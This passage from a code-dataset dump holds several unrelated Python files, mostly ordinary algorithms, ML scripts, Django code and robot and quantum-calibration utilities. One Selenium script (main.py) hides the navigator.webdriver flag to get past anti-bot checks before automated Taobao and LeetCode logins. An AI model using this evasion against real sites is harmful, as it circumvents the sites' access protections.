tmp[c][i] ==1:\n visit_info.add(i)\n q.append(i)\n # if i == c:\n # tmp[c][i] = 0\n # else:\n # tmp[c][i] = 0\n # tmp[c][i] = 0\n # for i in range(n): # N\n # if i == c: # 1\n # tmp[c][i] = 0 # 2n+1\n # # visit_info.add(i)\n # else: # 1\n # if tmp[c][i] == 1: #1\n # tmp[c][i] = 0 # 2n+1\n # tmp[i][c] = 0 # 2n+1\n # q.append(i) # 1\n # # visit_info.add(i)\n\n\n result[s] = visit_info\n print(result)\n\n\n\n# 3, [[1, 1, 0], [1, 1, 0], [0, 0, 1]] -> 2\n# 3, [[1, 1, 0], [1, 1, 1], [0, 1, 1]] ->1\nif __name__ == \"__main__\":\n ret = solution(3, [[1, 1, 0], [1, 1, 1], [0, 1, 1]] )\n # ret = solution(3, [[1, 1, 0], [1, 1, 0], [0, 0, 1]])\n print(ret)","repo_name":"HyunaShin/AlgorithmInterview","sub_path":"solved/programmers/dfs_bfs_43162.py","file_name":"dfs_bfs_43162.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"10506878691","text":"import time\nfrom selenium import webdriver\n\nimport common.fileUtil as FileUtil\nimport task.LeetcodeTask as LeetcodeTask\nimport task.JDTask as JDTask\nimport task.Taobao as Taobao\n\n# 通过指定chromedriver的路径来实例化driver对象,chromedriver放在当前目录。\n# driver = webdriver.Chrome(executable_path='./chromedriver')\n# chromedriver已经添加环境变量\ndriver = webdriver.Chrome()\n#cdp破解反爬虫\ndriver.execute_cdp_cmd(\"Page.addScriptToEvaluateOnNewDocument\", {\n \"source\": \"\"\"\n   Object.defineProperty(navigator, 'webdriver', {\n   get: () => undefined\n   })\n   \"\"\"\n})\n\noptions = webdriver.ChromeOptions()\noptions.add_experimental_option('excludeSwitches', ['enable-automation'])\noptions.add_experimental_option('useAutomationExtension', False)\n# options.add_argument(\"--disable-blink-features=AutomationControlled\")\n\nif FileUtil.read_yaml(\"leetcode\", \"execute\"):\n LeetcodeTask.loginLeetcode(driver)\n\nmobileEmulation = {'deviceName': 'iPhone X'}\noptions.add_experimental_option('mobileEmulation', 
mobileEmulation)\noptions.add_experimental_option('excludeSwitches',['enable-automation'])\noptions.add_experimental_option('useAutomationExtension', False)\ndriver = webdriver.Chrome(chrome_options=options)\ndriver.execute_cdp_cmd(\"Page.addScriptToEvaluateOnNewDocument\", {\n \"source\": \"\"\"\n   Object.defineProperty(navigator, 'webdriver', {\n   get: () => undefined\n   })\n   \"\"\"\n})\n#\n#\n# if FileUtil.read_yaml(\"JD\",\"execute\"):\n# JDTask.JDLogin(driver)\n#\nif FileUtil.read_yaml(\"Taobao\", \"execute\"):\n Taobao.TaobaoLogin(driver)\n\ntime.sleep(100)\n# # 退出浏览器\n# driver.quit()\n","repo_name":"youcai922/seleniumDemo","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"75097441238","text":"import random\n\n\ndef flatten_json(y):\n '''Flattens the JSON data\n '''\n out = {}\n\n def flatten(x, name=''):\n if type(x) is dict:\n for a in x:\n flatten(x[a], name + a + '__')\n elif type(x) is list:\n i = 0\n for a in x:\n flatten(a, name + str(i) + '__')\n i += 1\n else:\n out[name[:-2]] = x\n\n flatten(y)\n\n return out\n\n\ndef retry_timer(which_retry, retry_base_interval, mode=None):\n \"\"\"Calculate a random retry interval\n\n Args:\n mode(optional, default=None): specify the mode of retry time\n list of possible values: 'random', 'multiply', 'multirand'\n \"\"\"\n\n if mode is None:\n mode = 'random'\n\n if mode == 'random':\n retry_wait_interval = retry_base_interval * random.random()\n elif mode == 'multiply':\n retry_wait_interval = which_retry * retry_base_interval\n elif mode == 'multirand':\n retry_wait_interval = which_retry * retry_base_interval * random.random()\n\n return {'mode': mode, 'interval': retry_wait_interval, 'retry': which_retry}\n","repo_name":"emptymalei/tram-bot","sub_path":"app/utils/universal.py","file_name":"universal.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"1843913922","text":"import matplotlib.pyplot as plt\nimport random\nimport math\nimport sys\nimport subprocess\nimport numpy as np\n\n\nmode = 0 if sys.argv[1] == \"WTA\" else 1\neps = 0.001\nl = 3.0\nalpha = 0.1\nit = 0\nnCentroids = 10\ndef dist(a, b):\n return np.sqrt((b[0] - a[0])**2 + (b[1] - a[1])**2)\n\n\ndef generatePoints():\n points = []\n while len(points) != 100:\n tmp = [random.uniform(-5, -1), random.uniform(-2, 2)]\n if dist(tmp, [-3, 0]) < 2:\n points.append(tmp)\n\n while len(points) != 200:\n tmp = [random.uniform(1, 5), random.uniform(-2, 2)]\n if dist(tmp, [3, 0]) < 2:\n points.append(tmp)\n\n random.shuffle(points)\n return points\n\n\ndef generateCentroids():\n c = []\n for i in range(nCentroids):\n c.append([random.uniform(-10, 10), random.uniform(-10, 10)])\n random.seed(random.random())\n\n return c\n\ndef drawGraph(X, c):\n plt.clf()\n\n plt.scatter([i[0] for i in X], [i[1] for i in X], s=2, c='k')\n plt.scatter([i[0] for i in c], [i[1] for i in c], s=6, c='r')\n plt.plot([i[0] for i in c], [i[1] for i in c], 'r')\n plt.axis([-10.1, 10.1, -10.1, 10.1])\n plt.grid() \n global it\n plt.savefig(\"plot\" + str(it))\n it += 1\n # plt.show()\n\ndef findMinK(point, c):\n k = dist(point, c[0])\n q = 0\n for j in range(1, len(c)):\n d = dist(point, c[j])\n if d < k:\n k = d\n q = j\n\n return q\n\ndef calculateError(points, c):\n error = []\n for i in range(len(points)):\n error.append(dist(points[i], c[findMinK(points[i], 
c)]))\n return sum(error) / len(error)\n\ndef findRo(k, i):\n return abs(k - i)\n\ndef influence(k, kx):\n w = 0\n if not mode:\n if k == kx:\n w = 1\n return w\n else:\n w = (findRo(k, kx)**2) / (2 * l**2)\n return np.exp(-w)\n\npoints = generatePoints()\nc = generateCentroids()\nerror = []\nprevErr = calculateError(points, c)\nprint(prevErr)\ndrawGraph(points, c)\n\nfor i in range(int(sys.argv[2])):\n for j in range(len(points)):\n k = findMinK(points[j], c)\n for q in range(len(c)):\n inf = influence(q, k)\n c[q][0] = c[q][0] + alpha * inf * (points[j][0] - c[q][0])\n c[q][1] = c[q][1] + alpha * inf * (points[j][1] - c[q][1])\n if j % 10 == 0 and l > 0.5:\n l -= 0.5\n newErr = calculateError(points, c)\n print(newErr)\n prevErr = newErr\n error.append(prevErr)\n if i < 30 or i % 25 == 0: drawGraph(points, c)\n random.shuffle(points)\n\nplt.clf()\nplt.axis([0, len(error), min(error) - 0.1, max(error) + 0.1])\nplt.plot([i for i in range(len(error))], [i for i in error])\nplt.savefig(\"error\")\n","repo_name":"horseburger/IAD","sub_path":"task_2/warmup_5/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"34668507112","text":"import numpy as np\nfrom tensorflow.keras.optimizers import Adam\nimport tensorflow as tf\nimport matplotlib\nmatplotlib.use('agg')\nimport matplotlib.pyplot as plt\nplt.switch_backend('agg')\nfont = {'size' : 16}\nmatplotlib.rc('font', **font)\nimport time\nimport pickle\nfrom visco_aux import Ndpdti, dphidtaui_gov\n\ntaui = np.mgrid[-10000:10000:10j, -10000:10000:10j, -10000:10000:10j]\ntaui = taui.reshape([3,-1]).transpose()\n\ntaui = -np.sort(-taui)\ndphidtaui = np.zeros_like(taui)\nfor i in range(taui.shape[0]):\n dphidtaui[i] = dphidtaui_gov(taui[i])\n\ninputs = taui\noutputs = [dphidtaui[:,0], dphidtaui[:,1], dphidtaui[:,2]]\n\nstarttime = time.time()\nmodel = Ndpdti()\nmodel.inp.mean = tf.Variable([[np.mean(inputs) ]],dtype=tf.float32)\nmodel.inp.sd = tf.Variable([[np.std(inputs) ]],dtype=tf.float32)\nmodel.out.mean = tf.Variable([[np.mean(outputs)]],dtype=tf.float32)\nmodel.out.sd = tf.Variable([[np.std(outputs) ]],dtype=tf.float32)\nmodel.compile(loss = 'MSE', optimizer = Adam(learning_rate = 0.001))\nfit = model.fit(inputs, outputs, epochs = 5000, verbose = 0, workers=8)\ntrtime = time.strftime('%H:%M:%S', time.gmtime(time.time() - starttime))\nprint('Training time: ', trtime)\n\nweights = model.get_weights()\nwith open('saved/weights.pickle', 'wb') as f:\n pickle.dump(weights,f)\n\nwith open('saved/io.pickle', 'wb') as f:\n pickle.dump([inputs, outputs], f)\n\nfig, ax = plt.subplots()\nax.plot(fit.history['loss'])\nax.set_yscale('log')\nax.set(title='Loss: {loss:.3f}'.format(loss = fit.history['loss'][-1]), ylabel='Loss')\nfig.savefig('saved/loss.png')\n","repo_name":"tajtac/nvisco","sub_path":".ipynb_checkpoints/fit_dphidtA_tf-checkpoint.py","file_name":"fit_dphidtA_tf-checkpoint.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"15906364951","text":"from django.conf.urls import patterns, include, url\nfrom .views import Inicio, Exito, AltaUpdate, AltaWindows, Configuracion\n\nurlpatterns = patterns('',\n # Examples:\n \turl(r'^$', Inicio.as_view()),\n \t#url(r'^$', AltaUpdate , name=\"inicio\"),\n \t#url(r'^$', AltaWindows , name=\"inicio\"),\n \turl(r'^update/$', AltaUpdate , name=\"update\"),\n \turl(r'^windows/$', 
AltaWindows , name=\"windows\"),\n \turl(r'^exito/$', Exito.as_view()),\n \turl(r'^configuracion/$', Configuracion.as_view(), name=\"config\")\n)\n","repo_name":"sk8ivan/inegi","sub_path":"inegi/apps/inicio/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"71741347797","text":"import pytest\nfrom django.core.management import call_command\nfrom marketplace.models import Category\nfrom marketplace.models import CategoryGroup\nfrom marketplace.models import Marketplace\nfrom marketplace.models import Product\nfrom marketplace.models import ProductPage\nfrom marketplace.models import ProductState\n\nmarketplace = Marketplace(\n domain='www.test.by',\n description='too long',\n logo_url='https://test',\n delivery=False\n)\n\ncategory = Category(\n name='electronic',\n keywords='electronic',\n)\n\ncategory_group = CategoryGroup(\n category=category,\n parent=None,\n ru='Электроника',\n)\n\nproduct = Product(\n name='iPone',\n category=category,\n description='??',\n)\n\nproduct_page = ProductPage(\n product=product,\n marketplace=marketplace,\n url='www.test.by/ipone',\n)\n\nproduct_state = ProductState(\n product_page=product_page,\n price=199,\n price_currency='BYN',\n)\n\n\ndef test_marketplace_is_printable_ok():\n assert str(marketplace) == 'www.test.by'\n\n\ndef test_category_is_printable_ok():\n assert str(category) == 'electronic'\n\n\ndef test_category_group_is_printable_ok():\n assert str(category_group) == 'electronic'\n\n\ndef test_product_is_printable_ok():\n assert str(product) == 'iPone'\n\n\ndef test_semantic_id_ok():\n assert product.semantic_id == 'electronic/ipone'\n\n\ndef test_product_page_is_printable_ok():\n assert str(product_page) == 'iPone [www.test.by]'\n\n\ndef test_product_state_is_printable_ok():\n assert str(product_state) == 'iPone [www.test.by] [199 BYN]'\n\n\n@pytest.mark.django_db\ndef test_load_dump_ok():\n call_command('loaddata', 'dump/marketplace.yaml')\n\n\n@pytest.mark.django_db\ndef test_load_prod_ok():\n call_command('loaddata', 'prod/categories.yaml')\n call_command('loaddata', 'prod/marketplaces.yaml')\n","repo_name":"zifter/byprice24","sub_path":"backend/src/marketplace/models_tests.py","file_name":"models_tests.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"36773526258","text":"\"\"\"\n#UR Controller Client Interface Datastream Reader\n# For software version 3.x\n#\n# Datastream info found here: https://s3-eu-west-1.amazonaws.com/ur-support-site/16496/Client_Interface.xlsx\n# Struct library used to extract data, info found here: https://docs.python.org/2/library/struct.html\n\"\"\"\n\nimport socket\nimport time\nfrom contextlib import contextmanager\nfrom threading import Lock, Thread, Event\nfrom typing import Dict, Any, Optional\n\nfrom urx.ursecmon import ParserUtils, ParsingException\n\n\nclass URRobotPrimary:\n def __init__(self, ip: str, timeout: float = 5):\n \"\"\"\n The primary interface (30011, read-only) to UR Robot\n\n This is used to monitor the popup in the robot arm.\n\n Args:\n ip: the ip address to the UR Robot\n timeout: timeout time in sec\n \"\"\"\n # set up socket connection\n self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self._socket.settimeout(timeout)\n self._socket.connect((ip, 30011))\n time.sleep(0.1)\n self._socket.recv(4096)\n\n self._parser = ParserUtils()\n\n 
self._thread = None\n self._mutex_lock = Lock()\n\n self._stop_event = Event()\n\n self._popup_title: Optional[str] = None\n self._popup_message: Optional[str] = None\n\n def close(self):\n self._socket.close()\n\n def read_data(self) -> Dict[str, Any]:\n self._mutex_lock.acquire()\n\n try:\n data = self._socket.recv(4096)\n try:\n data = self._parser.parse(data)\n except ParsingException:\n return {}\n return data\n except:\n return {}\n finally:\n self._mutex_lock.release()\n\n def read_popup(self):\n data = self.read_data()\n if \"popupMessage\" in data:\n return {\n \"title\": data[\"popupMessage\"][\"messageTitle\"].decode(\"utf-8\"),\n \"message\": data[\"popupMessage\"][\"messageText\"].decode(\"utf-8\"),\n }\n return None\n\n def keep_monitoring_popup(self):\n while True:\n if not self._stop_event.is_set():\n popup = self.read_popup()\n if popup is not None:\n self._popup_message = popup[\"message\"]\n self._popup_title = popup[\"title\"]\n else:\n break\n time.sleep(0.1)\n\n @contextmanager\n def monitor_popup(self):\n need_release = False\n try:\n if self._thread is None:\n self._thread = Thread(target=self.keep_monitoring_popup)\n self._thread.start()\n need_release = True\n yield self\n finally:\n if need_release:\n self._stop_event.set()\n self._thread.join()\n self._thread = None\n self._stop_event.clear()\n self.clear_popup_cache()\n\n @property\n def popup_title(self) -> Optional[str]:\n return self._popup_title\n\n @property\n def popup_message(self) -> Optional[str]:\n return self._popup_message\n\n def clear_popup_cache(self):\n \"\"\"\n Clear the cache of popup message and title\n\n It should be used with the close popup\n \"\"\"\n self._popup_title = None\n self._popup_message = None\n","repo_name":"CederGroupHub/alab_control","sub_path":"alab_control/robot_arm_ur5e/ur_robot_primary.py","file_name":"ur_robot_primary.py","file_ext":"py","file_size_in_byte":3366,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"85"} +{"seq_id":"71631603797","text":"\nimport typing as tp\nimport os\nimport logging\nimport json\nimport random\nimport multiprocessing\nfrom datetime import datetime\nfrom itertools import combinations\n\nimport torch\nimport torchaudio\nimport numpy\nimport librosa\n\nfrom .datanodes import DataNode\n\n_metric_cls_map = dict()\n_metric_name_map = dict()\n\ndef get_metric_cls(name):\n return _metric_cls_map[name]\n\ndef get_metric_name(cls):\n return _metric_name_map[cls]\n\ndef add_metric_cls(name, cls):\n _metric_cls_map[name] = cls\n _metric_name_map[cls] = name\n\nclass MetricSpec(object):\n def __init__(self,\n metric_name : str,\n input_metadata_path : str,\n output_metadata_path : str,\n seed : int,\n journal_path : str,\n log_path : str,\n log_level : str,\n jobs : int=None,\n device : str='cpu'):\n\n self.metric_name = metric_name\n self.input_metadata_path = input_metadata_path\n self.output_metadata_path = output_metadata_path\n self.seed = seed\n self.journal_path = journal_path\n self.log_level = log_level\n self.log_path = log_path\n self.jobs = jobs\n self.device = device\n\n @classmethod\n def from_dict(cls, d : tp.Dict):\n metric_cls = get_metric_cls(d['type'])\n metric_args = metric_cls.additional_args(d)\n return metric_cls(\n metric_name=d['metric_name'],\n input_metadata_path=d['input_metadata_path'],\n output_metadata_path=d['output_metadata_path'],\n seed=d.get('seed') or None,\n journal_path=d['journal_path'],\n log_level=d.get('log_level') or 'INFO',\n log_path=d['log_path'],\n 
jobs=d.get('jobs'),\n device=d.get('device') or 'cpu',\n **metric_args\n )\n\n @classmethod\n def additional_args(cls, d : tp.Dict):\n return dict()\n\n def to_dict(self):\n return dict(\n type=get_metric_name(type(self)),\n metric_name=self.metric_name,\n input_metadata_path=str(self.input_metadata_path),\n output_metadata_path=str(self.output_metadata_path),\n seed=self.seed,\n journal_path=str(self.journal_path) if self.journal_path else None,\n log_level=self.log_level,\n log_path=str(self.log_path) if self.log_path else None,\n jobs=self.jobs,\n device=self.device,\n **(self.metric_args())\n )\n\n def metric_args(self):\n return dict()\n\n def put_single_metric(self, data, metadata):\n raise NotImplementedError()\n\n def put_metrics(self):\n _put_metrics(self)\n\nclass MetricJournal(object):\n def __init__(self,\n created_at : datetime,\n seed : int,\n metric_value : float):\n self.created_at = created_at\n self.seed = seed\n self.metric_value = metric_value\n\n @classmethod\n def from_dict(cls, d : tp.Dict):\n return cls(\n created_at=datetime.fromisoformat(d['created_at']),\n seed=d['seed'],\n metric_value=d['metric_value'],\n )\n\n def to_dict(self):\n return {\n 'created_at': self.created_at.isoformat(),\n 'seed': self.seed,\n 'metric_value': self.metric_value,\n }\n\nclass MetricSetJournal(object):\n def __init__(self,\n process_start : datetime,\n process_finish : datetime,\n metadata_path : str,\n log_path : str,\n spec,\n metric_journals : tp.List[MetricJournal]):\n self.process_start = process_start\n self.process_finish = process_finish\n self.metadata_path = metadata_path\n self.log_path = log_path\n self.spec = spec\n self.metric_journals = metric_journals\n\n @classmethod\n def from_dict(cls, d : tp.Dict):\n return cls(\n process_start=datetime.fromisoformat(d['process_start']),\n process_finish=datetime.fromisoformat(d['process_finish']),\n metadata_path=d['metadata_path'],\n log_path=d.get('log_path'),\n spec=MetricSpec.from_dict(d['spec']),\n metric_journals=[\n MetricJournal.from_dict(j) if j else None\n for j in d['metric_journals']\n ] if d.get('metric_journals') else None\n )\n\n def to_dict(self):\n return {\n 'process_start': self.process_start.isoformat(),\n 'process_finish': self.process_finish.isoformat(),\n 'metadata_path': str(self.metadata_path) if self.metadata_path else None,\n 'log_path': str(self.log_path) if self.log_path else None,\n 'spec': self.spec.to_dict(),\n 'metric_journals': [\n j.to_dict() if j else None for j in self.metric_journals\n ] if self.metric_journals else None\n }\n\n\nclass EntropyDifficulty(MetricSpec):\n def __init__(self,\n metric_name : str,\n input_metadata_path : str,\n output_metadata_path : str,\n seed : int,\n journal_path : str,\n log_path : str,\n log_level : str,\n jobs : int=None,\n device : str='cpu',\n n_fft : int=2048,\n win_length : int=2048,\n hop_length : int=512,\n ):\n\n super().__init__(\n metric_name=metric_name,\n input_metadata_path=input_metadata_path,\n output_metadata_path=output_metadata_path,\n seed=seed,\n journal_path=journal_path,\n log_path=log_path,\n log_level=log_level,\n jobs=jobs,\n device=device,\n )\n self.n_fft = n_fft\n self.win_length = win_length\n self.hop_length = hop_length\n\n def put_single_metric(self, data, metadata):\n specgrams = [\n torch.stft(\n d['wave'],\n n_fft=self.n_fft,\n hop_length=self.hop_length,\n win_length=self.win_length,\n return_complex=True,\n ).abs().clamp(min=1e-3) ** 2\n for d in data\n ]\n\n total_specgram = sum(specgrams)\n score = sum(\n 
torch.sum(-specgram/total_specgram\n * torch.log2(specgram/total_specgram))\n for specgram in specgrams\n ) / total_specgram.numel()\n return score.item()\n\n @classmethod\n def additional_args(cls, d : tp.Dict):\n return {\n 'n_fft': d.get('n_fft') or 2048,\n 'win_length': d.get('win_length') or 2048,\n 'hop_length': d.get('hop_length') or 512,\n }\n\n def metric_args(self):\n return {\n 'n_fft': self.n_fft,\n 'win_length': self.win_length,\n 'hop_length': self.hop_length,\n }\n\nadd_metric_cls('entropy', EntropyDifficulty)\n\nclass FrequencyDifficulty(MetricSpec):\n def __init__(self,\n metric_name : str,\n input_metadata_path : str,\n output_metadata_path : str,\n seed : int,\n sample_rate : int,\n journal_path : str,\n log_path : str,\n log_level : str,\n jobs : int=None,\n device : str='cpu',\n win_length : int=2048\n ):\n\n super().__init__(\n metric_name=metric_name,\n input_metadata_path=input_metadata_path,\n output_metadata_path=output_metadata_path,\n seed=seed,\n journal_path=journal_path,\n log_path=log_path,\n log_level=log_level,\n jobs=jobs,\n device=device,\n )\n self.sample_rate = sample_rate\n self.win_length = win_length\n\n def put_single_metric(self, data, metadata):\n waves = numpy.stack([d['wave'].numpy() for d in data])\n f0, voiced_flag, voiced_prob = librosa.pyin(\n waves,\n fmin=librosa.note_to_hz('C2'),\n fmax=librosa.note_to_hz('C7'),\n sr=self.sample_rate,\n frame_length=self.win_length,\n )\n f0 = numpy.nan_to_num(f0, nan=0.0)\n score = sum(\n numpy.abs(f0_a - f0_b).sum().item()\n for f0_a, f0_b in combinations(f0, 2)\n ) / (len(f0)*(len(f0)-1)/2 * f0.shape[-1])\n\n return score\n\n @classmethod\n def additional_args(cls, d : tp.Dict):\n return {\n 'sample_rate': d['sample_rate'],\n 'win_length': d.get('win_length') or 2048,\n }\n\n def metric_args(self):\n return {\n 'sample_rate': self.sample_rate,\n 'win_length': self.win_length,\n }\n\nadd_metric_cls('frequency', FrequencyDifficulty)\n\ndef _put_metrics(spec : MetricSpec):\n\n process_start = datetime.now()\n\n # setup seed\n random_ = random.Random(spec.seed)\n\n # prepare log\n logger = None\n if spec.log_path:\n if not os.path.exists(os.path.dirname(spec.log_path)):\n os.makedirs(os.path.dirname(spec.log_path), exist_ok=True)\n logger = logging.getLogger(__name__)\n logger.setLevel(spec.log_level)\n handler = logging.FileHandler(str(spec.log_path))\n handler.setFormatter(\n logging.Formatter('[%(levelname)s] %(message)s'))\n logger.addHandler(handler)\n\n # load metadata\n with open(spec.input_metadata_path, 'r') as fp:\n datanode = DataNode.from_dict(\n json.load(fp),\n context={\n 'rel_path': os.path.dirname(spec.input_metadata_path),\n 'device': spec.device,\n },\n )\n chain_lists = [\n datanode.get_single_chain(i) for i in range(len(datanode))\n ]\n\n # prepare arguments\n args = [(\n sample_i,\n chain_list,\n spec,\n random_.randrange(2**32), #seed,\n ) for sample_i, chain_list in enumerate(chain_lists)]\n\n # map func\n if spec.jobs is not None:\n pool = multiprocessing.Pool(spec.jobs)\n map_fn = pool.imap_unordered\n else:\n map_fn = map\n\n if logger:\n logger.info(json.dumps({\n 'type': 'start_mixing',\n 'timestamp': datetime.now().isoformat(),\n 'input_sample_size': len(chain_lists),\n }))\n\n # iterate over dataset and find mixtures\n leaf_nodes = datanode.list_leaf_node()\n journal_list = [None for _ in range(len(datanode))]\n for i, metric_value, journals in map_fn(_make_metric_for_sample, args):\n leaf_nodes[i].push_metric(spec.metric_name, metric_value)\n journal_list[i] = journals\n if 
logger:\n logger.info(json.dumps({\n 'type': 'made_metric',\n 'timestamp': datetime.now().isoformat(),\n 'sample_index': i,\n 'metric_name': spec.metric_name,\n 'metric_value': metric_value,\n }))\n\n # close map function\n if spec.jobs is not None:\n pool.close()\n\n process_finish = datetime.now()\n\n # save metadata\n if not os.path.exists(os.path.dirname(spec.output_metadata_path)):\n os.makedirs(os.path.dirname(spec.output_metadata_path))\n with open(spec.output_metadata_path, 'w') as fp:\n json.dump(datanode.to_dict(), fp)\n\n if logger:\n logger.info(json.dumps({\n 'type': 'save_mixtures',\n 'timestamp': datetime.now().isoformat(),\n 'output_path': str(spec.output_metadata_path),\n 'output_size': len(datanode),\n }))\n\n # save journal\n if spec.journal_path is not None:\n if not os.path.exists(os.path.dirname(spec.journal_path)):\n os.makedirs(os.path.dirname(spec.journal_path))\n metric_journal = MetricSetJournal(\n process_start=process_start,\n process_finish=process_finish,\n metadata_path=os.path.relpath(\n spec.output_metadata_path,\n os.path.dirname(spec.journal_path)\n ),\n log_path=os.path.relpath(\n spec.output_metadata_path,\n os.path.dirname(spec.log_path)\n ) if spec.log_path else None,\n spec=spec,\n metric_journals=journal_list,\n )\n with open(spec.journal_path, 'w') as fp:\n json.dump(metric_journal.to_dict(), fp)\n\n if logger:\n logger.info(json.dumps({\n 'type': 'save_metric_journal',\n 'timestamp': datetime.now().isoformat(),\n 'journal_path': str(spec.journal_path),\n }))\n\n # finish epoch and close log handler\n if logger:\n logger.info(json.dumps({\n 'type': 'finish_metric',\n 'timestamp': datetime.now().isoformat(),\n }))\n handlers = logger.handlers[:]\n for handler in handlers:\n logger.removeHandler(handler)\n handler.close()\n\n\ndef _make_metric_for_sample(args):\n sample_i, node_list, spec, seed = args\n data, metadata = DataNode.process_single_chain(node_list)\n metric_value = spec.put_single_metric(data, metadata)\n journal = MetricJournal(created_at=datetime.now(),\n seed=seed,\n metric_value=metric_value)\n\n return sample_i, metric_value, journal\n\n","repo_name":"leichtrhino/echidna","sub_path":"echidna/data/difficulties.py","file_name":"difficulties.py","file_ext":"py","file_size_in_byte":13499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"38316265299","text":"import logging\nimport unittest\nfrom typing import Any, Dict\n\nfrom mock import patch\nfrom pyhocon import ConfigFactory\n\nfrom databuilder import Scoped\nfrom databuilder.extractor.dashboard.tableau.tableau_dashboard_query_extractor import TableauDashboardQueryExtractor\nfrom databuilder.extractor.dashboard.tableau.tableau_dashboard_utils import (\n TableauDashboardAuth, TableauGraphQLApiExtractor,\n)\n\nlogging.basicConfig(level=logging.INFO)\n\n\ndef mock_query(*_args: Any, **_kwargs: Any) -> Dict[str, Any]:\n return {\n 'customSQLTables': [\n {\n 'id': 'fake-query-id',\n 'name': 'Test Query',\n 'query': 'SELECT * FROM foo',\n 'downstreamWorkbooks': [\n {\n 'name': 'Test Workbook',\n 'projectName': 'Test Project'\n }\n ]\n }\n ]\n }\n\n\ndef mock_token(*_args: Any, **_kwargs: Any) -> str:\n return '123-abc'\n\n\nclass TestTableauDashboardQuery(unittest.TestCase):\n\n @patch.object(TableauDashboardAuth, '_authenticate', mock_token)\n @patch.object(TableauGraphQLApiExtractor, 'execute_query', mock_query)\n def test_dashboard_query_extractor(self) -> None:\n\n config = ConfigFactory.from_dict({\n 
'extractor.tableau_dashboard_query.api_base_url': 'api_base_url',\n 'extractor.tableau_dashboard_query.api_version': 'tableau_api_version',\n 'extractor.tableau_dashboard_query.site_name': 'tableau_site_name',\n 'extractor.tableau_dashboard_query.tableau_personal_access_token_name':\n 'tableau_personal_access_token_name',\n 'extractor.tableau_dashboard_query.tableau_personal_access_token_secret':\n 'tableau_personal_access_token_secret',\n 'extractor.tableau_dashboard_query.excluded_projects': [],\n 'extractor.tableau_dashboard_query.cluster': 'tableau_dashboard_cluster',\n 'extractor.tableau_dashboard_query.database': 'tableau_dashboard_database',\n 'extractor.tableau_dashboard_query.transformer.timestamp_str_to_epoch.timestamp_format':\n '%Y-%m-%dT%H:%M:%SZ',\n\n })\n\n extractor = TableauDashboardQueryExtractor()\n extractor.init(Scoped.get_scoped_conf(conf=config, scope=extractor.get_scope()))\n record = extractor.extract()\n\n self.assertEqual(record._query_name, 'Test Query')\n self.assertEqual(record._query_text, 'SELECT * FROM foo')\n self.assertEqual(record._dashboard_id, 'Test Workbook')\n self.assertEqual(record._dashboard_group_id, 'Test Project')\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"amundsen-io/amundsen","sub_path":"databuilder/tests/unit/extractor/dashboard/tableau/test_tableau_dashboard_query_extractor.py","file_name":"test_tableau_dashboard_query_extractor.py","file_ext":"py","file_size_in_byte":2700,"program_lang":"python","lang":"en","doc_type":"code","stars":4118,"dataset":"github-code","pt":"85"} +{"seq_id":"15987718723","text":"class Solution:\n def SortColors(self, nums: [int]):\n rez = {0: 0, 1: 0, 2: 0}\n\n for i in nums:\n rez[i] += 1\n\n k = 0\n for i in range(len(nums)):\n if rez[k] != 0:\n nums[i] = k\n rez[k] -= 1\n else:\n k += 1\n nums[i] = k\n rez[k] -= 1\n\n print(nums)\n\n\nif __name__ == '__main__':\n solution = Solution()\n\n solution.SortColors([0, 2])\n","repo_name":"RndmCodeGuy20/Striver-Sheet","sub_path":"Day 1 - Arrays I/75. 
Sort Colors/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"35915771245","text":"from typing import Dict, List, Optional, Sequence\n\nfrom qiskit.circuit import QuantumCircuit\nfrom qiskit.providers.backend import Backend\n\nfrom qiskit_experiments.framework import ExperimentData\nfrom qiskit_experiments.library.characterization.ramsey_xy import RamseyXY\nfrom qiskit_experiments.calibration_management.calibrations import Calibrations\nfrom qiskit_experiments.calibration_management.update_library import BaseUpdater\nfrom qiskit_experiments.calibration_management.base_calibration_experiment import (\n BaseCalibrationExperiment,\n)\n\n\nclass FrequencyCal(BaseCalibrationExperiment, RamseyXY):\n \"\"\"A qubit frequency calibration experiment based on the Ramsey XY experiment.\"\"\"\n\n def __init__(\n self,\n physical_qubits: Sequence[int],\n calibrations: Calibrations,\n backend: Optional[Backend] = None,\n cal_parameter_name: Optional[str] = \"drive_freq\",\n delays: Optional[List] = None,\n osc_freq: float = 2e6,\n auto_update: bool = True,\n ):\n \"\"\"\n Args:\n physical_qubits: Sequence containing the qubit on which to run the\n frequency calibration.\n calibrations: The calibrations instance with the schedules.\n backend: Optional, the backend to run the experiment on.\n cal_parameter_name: The name of the parameter to update in the calibrations.\n This defaults to `drive_freq`.\n delays: The list of delays that will be scanned in the experiment, in seconds.\n osc_freq: A frequency shift in Hz that will be applied by means of\n a virtual Z rotation to increase the frequency of the measured oscillation.\n auto_update: If set to True, which is the default, then the experiment will\n automatically update the frequency in the calibrations.\n \"\"\"\n super().__init__(\n calibrations,\n physical_qubits,\n backend=backend,\n delays=delays,\n osc_freq=osc_freq,\n cal_parameter_name=cal_parameter_name,\n auto_update=auto_update,\n )\n\n def _metadata(self) -> Dict[str, 